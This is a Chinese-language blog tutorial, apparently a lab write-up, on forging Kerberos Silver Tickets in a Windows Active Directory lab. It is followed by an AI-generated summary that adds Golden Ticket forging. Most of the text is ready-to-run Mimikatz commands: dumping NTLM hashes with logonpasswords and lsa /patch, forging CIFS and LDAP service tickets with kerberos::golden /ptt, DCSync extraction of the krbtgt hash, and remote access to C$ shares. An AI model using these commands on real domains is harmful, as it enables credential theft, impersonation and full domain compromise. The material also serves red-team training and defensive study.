3.5 Silver Ticket白银票据制作原理及利用方式

文章详细描述了一个关于如何通过伪造白银票据(ST)来访问Windows域服务的实验,包括获取域控信息、服务账号的NTLMHash、使用Mimikatz工具伪造票据并访问不同服务的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

服务账号介绍

服务账号就是计算机名字+$用来管理服务的账号

白银票据原理

如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。 在Kerberos认证的第三部,Client带着ST和Authenticator3向Server上的某个服务进行请求,Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问
server上的指定服务了。所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用。

实验内容

实验环境

机器名称

IP地址

Windows 10_1(域成员)

192.168.26.129

Windows 10_2(域成员)

192.168.26.130

Windows server 2016(域控)

192.168.26.114

实验前提

  1. 已经控制了域名并且使用域管理员登录或者提权的system
  2. 我们目的是访问Windows 10_2的机器

条件如下:

  1. 域名称
  2. 域的SID值
  3. 目标服务器名称
  4. 可以利用的服务
  5. 服务账号的NTLM Hash
  6. 伪造任意用户名

实验步骤

控制域控
  1. 获取基本信息(域控)
shell whoami /user 获取域的sid值(去掉最后的-500,500表示administrator用户)
shell net config workstation	查看域

SID:S-1-5-21-2665115189-2951733486-2104235742

  1. 获取服务账号的NTLM Hash值(域控)
mimikatz sekurlsa::logonpasswords

Hash:cb651a1ffbd25853dca7ac9aabaa94af

  1. 伪造票据(CIFS服务)在域内主机上(不是域控!)
mimikatz kerberos::tgt		查票
mimikatz kerberos::purge	清票
shell klist		查票
shell klist purge		清票
mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-2665115189-2951733486-2104235742 /target:dc.hack.com /service:cifs /rc4:cb651a1ffbd25853dca7ac9aabaa94af /user:abcd /ptt

  1. 访问域控(用创建票据的域内主机)
shell dir \\dc.hack.com\c$

之前访问

有白银票据之后访问

伪造票据(LDAP共享服务)

mimikatz kerberos::tgt		查票
mimikatz kerberos::purge	清票
shell klist		查票
shell klist purge		清票
mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-2665115189-2951733486-2104235742 /target:dc.hack.com /service:LDAP /rc4:cb651a1ffbd25853dca7ac9aabaa94af /user:abcd /ptt

  1. 查询域控的krbtgt(在域内主机上查询(没有LDAP白银票据是无法查询的))
mimikatz lsadump::dcsync /dc:dc.hack.com /domain:hack.com /user:krbtgt

原本获取不到

添加票据之后,可以获取

控制另一台域主机(Windows10 NW2)
  1. 获取基本信息(域控上获取Windows10 NW2信息)
mimikatz lsadump::dcsync /domain:hack.com /user:PC-nw2$
mimikatz lsadump::lsa /patch		#获取所有域用户的Hash值
mimikatz sekurlsa::msv					#获取当前主机的SID和Hash值

SID:S-1-5-21-2665115189-2951733486-2104235742

Hash:79871a923c6d9969c220c1bf7230d550

  1. 伪造票据(CIFS服务)在域内主机上(不是域控!)
mimikatz kerberos::tgt		查票
mimikatz kerberos::purge	清票
shell klist		查票
shell klist purge		清票
mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-2665115189-2951733486-2104235742 /target:PC-nw2.hack.com /service:cifs /rc4:79871a923c6d9969c220c1bf7230d550 /user:abcd /ptt

  1. 访问Windows10 NW2(用创建票据的域内主机)
shell dir \\PC-nw2.hack.com\c$

之前访问

之后访问

### 域渗透中的白银票据与黄金票据 #### 白银票据 (Silver Ticket) 的配置与伪造方法 白银票据是一种针对特定服务的伪造 Kerberos 票据。它允许攻击者冒充某个用户身份来访问指定的服务,而无需获得整个域的控制权。 以下是伪造白银票据的过程: 1. **收集目标信息** 需要获取目标域的信息,包括域名 (`test.lab`) 和 SID (`S-1-5-21-...`)[^3]。还需要知道目标服务名称(如 `LDAP`)、目标主机名以及用于加密的目标账户哈希值(通常是 NTLM 或 RC4 密钥)。 2. **生成白银票据** 使用 Mimikatz 工具生成伪造的 LDAP 服务票据,并将其保存到文件中: ```bash mimikatz "kerberos::golden /domain:test.lab /sid:S-1-5-21-2196907948-52438630-2517523304 /target:DC.test.lab /service:ldap /rc4:065c43c4ca3bfba69038978836565ffe /user:administrator /ticket:silver.kirbi" ``` 3. **注入票据** 将生成的白银票据注入到当前会话的内存中以便使用: ```bash mimikatz "kerberos::ptt silver.kirbi" ``` 通过上述操作,攻击者可以伪装成管理员身份访问目标服务器上的 LDAP 服务[^2]。 --- #### 黄金票据 (Golden Ticket) 的配置与伪造方法 相比白银票据,黄金票据提供了更广泛的权限——它可以绕过 TGT 获取阶段直接创建有效的 TGT 票据,从而实现对整个域资源的无限制访问。 其主要步骤如下: 1. **提取 krbtgt 账户密码散列** 这一步通常依赖于已有的高权限凭证或者通过其他漏洞完成。例如,在拥有 Domain Admin 权限的情况下可以从 Active Directory 数据库导出 krbtgt 散列值。 2. **生成黄金票据** 利用 Mimikatz 创建自定义的有效期无限长且不受时间戳约束的 TGT: ```bash mimikatz "kerberos::golden /user:Administrator /domain:de1ay.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:82dfc71b72a11ef37d663047bc2088fb /id:500 /ptt" ``` 此命令将自动加载新生成的黄金票据至当前进程环境变量中[^4]。 --- #### Kerberos 攻击技巧对比分析 | 特性 | 黄金票据 | 白银票据 | |--------------------|-----------------------------------|------------------------------| | 影响范围 | 控制全域能力 | 局部服务能力 | | 所需条件 | Krbtgt hash | Service account credentials | | 复杂度 | 较高 | 中等 | | 检测难度 | 更难 | 易被发现 | 尽管两者都基于相同的原理即滥用Kerberos协议机制,但由于作用层面不同所以在实际应用中有各自适用场景. ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值